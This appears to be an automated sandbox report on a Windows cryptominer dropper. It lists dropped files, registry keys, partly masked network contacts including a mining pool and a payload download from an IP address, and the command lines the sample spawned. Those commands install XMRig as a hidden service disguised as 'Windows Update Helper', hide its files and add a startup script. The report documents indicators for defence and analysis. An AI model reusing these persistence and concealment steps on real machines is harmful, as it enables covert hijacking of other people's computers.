Technical Information
- %APPDATA%\microsoft\windows\start menu\programs\startup\xmr_startup.bat
- [HKLM\SYSTEM\CurrentControlSet\Services\xxx] 'Start' = '00000002'
- [HKLM\SYSTEM\CurrentControlSet\Services\xxx] 'ImagePath' = '%WINDIR%\xmr\nssm.exe'
- [HKLM\SYSTEM\CurrentControlSet\Services\WinRing0_1_2_0] 'ImagePath' = '%WINDIR%\xmr\WinRing0x64.sys'
- 'xxx' %WINDIR%\xmr\nssm.exe
- 'WinRing0_1_2_0' %WINDIR%\xmr\WinRing0x64.sys
- %TEMP%\_mei34042\vcruntime140.dll
- %TEMP%\_mei34042\vcruntime140_1.dll
- %TEMP%\_mei34042\_asyncio.pyd
- %TEMP%\_mei34042\_bz2.pyd
- %TEMP%\_mei34042\_ctypes.pyd
- %TEMP%\_mei34042\_decimal.pyd
- %TEMP%\_mei34042\_hashlib.pyd
- %TEMP%\_mei34042\_lzma.pyd
- %TEMP%\_mei34042\_multiprocessing.pyd
- %TEMP%\_mei34042\_overlapped.pyd
- %TEMP%\_mei34042\_queue.pyd
- %TEMP%\_mei34042\_socket.pyd
- %TEMP%\_mei34042\_ssl.pyd
- %TEMP%\_mei34042\_wmi.pyd
- %TEMP%\_mei34042\base_library.zip
- %TEMP%\_mei34042\certifi\cacert.pem
- %TEMP%\_mei34042\charset_normalizer\md.cp312-win_amd64.pyd
- %TEMP%\_mei34042\charset_normalizer\md__mypyc.cp312-win_amd64.pyd
- %TEMP%\_mei34042\libcrypto-3.dll
- %TEMP%\_mei34042\libffi-8.dll
- %TEMP%\_mei34042\libssl-3.dll
- %TEMP%\_mei34042\pyexpat.pyd
- %TEMP%\_mei34042\python312.dll
- %TEMP%\_mei34042\pywin32_system32\pywintypes312.dll
- %TEMP%\_mei34042\select.pyd
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\installer
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\license
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\metadata
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\record
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\wheel
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt
- %TEMP%\_mei34042\setuptools\_vendor\jaraco\text\lorem ipsum.txt
- %TEMP%\_mei34042\unicodedata.pyd
- %TEMP%\_mei34042\win32\_win32sysloader.pyd
- %TEMP%\_mei34042\win32\perfmon.pyd
- %TEMP%\_mei34042\win32\servicemanager.pyd
- %TEMP%\_mei34042\win32\win32api.pyd
- %TEMP%\_mei34042\win32\win32evtlog.pyd
- %TEMP%\_mei34042\win32\win32gui.pyd
- %TEMP%\_mei34042\win32\win32security.pyd
- %TEMP%\_mei34042\win32\win32service.pyd
- %WINDIR%\xmr\winring0x64.sys
- %WINDIR%\xmr\config.json
- %WINDIR%\xmr\xmrig.exe
- %WINDIR%\xmr\nssm.exe
- %TEMP%\delete_self.bat
- nul
- %WINDIR%\xmr\winring0x64.sys
- %WINDIR%\xmr\config.json
- %WINDIR%\xmr\xmrig.exe
- %WINDIR%\xmr\nssm.exe
- %APPDATA%\microsoft\windows\start menu\programs\startup\xmr_startup.bat
- %TEMP%\_mei34042\base_library.zip
- %TEMP%\_mei34042\certifi\cacert.pem
- %TEMP%\_mei34042\charset_normalizer\md.cp312-win_amd64.pyd
- %TEMP%\_mei34042\charset_normalizer\md__mypyc.cp312-win_amd64.pyd
- %TEMP%\_mei34042\libcrypto-3.dll
- %TEMP%\_mei34042\libffi-8.dll
- %TEMP%\_mei34042\libssl-3.dll
- %TEMP%\_mei34042\pyexpat.pyd
- %TEMP%\_mei34042\python312.dll
- %TEMP%\_mei34042\pywin32_system32\pywintypes312.dll
- %TEMP%\_mei34042\select.pyd
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\installer
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\license
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\metadata
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\record
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\top_level.txt
- %TEMP%\_mei34042\setuptools\_vendor\importlib_metadata-8.0.0.dist-info\wheel
- %TEMP%\_mei34042\setuptools\_vendor\jaraco\text\lorem ipsum.txt
- %TEMP%\_mei34042\unicodedata.pyd
- %TEMP%\_mei34042\vcruntime140.dll
- %TEMP%\_mei34042\vcruntime140_1.dll
- %TEMP%\_mei34042\win32\perfmon.pyd
- %TEMP%\_mei34042\win32\servicemanager.pyd
- %TEMP%\_mei34042\win32\win32api.pyd
- %TEMP%\_mei34042\win32\win32evtlog.pyd
- %TEMP%\_mei34042\win32\win32gui.pyd
- %TEMP%\_mei34042\win32\win32security.pyd
- %TEMP%\_mei34042\win32\win32service.pyd
- %TEMP%\_mei34042\win32\_win32sysloader.pyd
- %TEMP%\_mei34042\_asyncio.pyd
- %TEMP%\_mei34042\_bz2.pyd
- %TEMP%\_mei34042\_ctypes.pyd
- %TEMP%\_mei34042\_decimal.pyd
- %TEMP%\_mei34042\_hashlib.pyd
- %TEMP%\_mei34042\_lzma.pyd
- %TEMP%\_mei34042\_multiprocessing.pyd
- %TEMP%\_mei34042\_overlapped.pyd
- %TEMP%\_mei34042\_queue.pyd
- %TEMP%\_mei34042\_socket.pyd
- %TEMP%\_mei34042\_ssl.pyd
- %TEMP%\_mei34042\_wmi.pyd
- '47.##.78.193':9001
- 'mo#####.map.fastly.net':443
- 'au##.c3pool.org':80
- http://47.##.78.193:9001/amin/nssm.exe via 47.##.78.193
- 'au##.c3pool.org':80
- DNS ASK mo#####.map.fastly.net
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- DNS ASK au##.c3pool.org
- '%WINDIR%\xmr\nssm.exe' install xxx %WINDIR%\xmr\xmrig.exe --config=%WINDIR%\xmr\config.json
- '%WINDIR%\xmr\nssm.exe' set xxx AppDirectory %WINDIR%\xmr
- '%WINDIR%\xmr\nssm.exe' set xxx AppPriority BELOW_NORMAL_PRIORITY_CLASS
- '%WINDIR%\xmr\nssm.exe' set xxx Description "Windows Update Helper"
- '%WINDIR%\xmr\nssm.exe'
- '%WINDIR%\xmr\xmrig.exe' --config=%WINDIR%\xmr\config.json
- '<SYSTEM32>\cmd.exe' /c "tasklist /fi "imagename eq xmrig.exe""
- '<SYSTEM32>\tasklist.exe' /fi "imagename eq xmrig.exe"
- '<SYSTEM32>\cmd.exe' /c "attrib +s +h "%WINDIR%\xmr""
- '<SYSTEM32>\attrib.exe' +s +h "%WINDIR%\xmr"
- '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe install xxx %WINDIR%\xmr\xmrig.exe --config=%WINDIR%\xmr\config.json"
- '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx AppDirectory %WINDIR%\xmr"
- '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx AppPriority BELOW_NORMAL_PRIORITY_CLASS"
- '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx Description "Windows Update Helper""
- '<SYSTEM32>\cmd.exe' /c "attrib +s +h "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\xmr_startup.bat""
- '<SYSTEM32>\attrib.exe' +s +h "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\xmr_startup.bat"
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\delete_self.bat"
- '<SYSTEM32>\timeout.exe' /t 3 /nobreak
- '<SYSTEM32>\cmd.exe' /c "tasklist /fi "imagename eq xmrig.exe""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "attrib +s +h "%WINDIR%\xmr""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe install xxx %WINDIR%\xmr\xmrig.exe --config=%WINDIR%\xmr\config.json"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx AppDirectory %WINDIR%\xmr"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx AppPriority BELOW_NORMAL_PRIORITY_CLASS"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%WINDIR%\xmr\nssm.exe set xxx Description "Windows Update Helper""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "attrib +s +h "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\xmr_startup.bat""' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c "%TEMP%\delete_self.bat"' (with hidden window)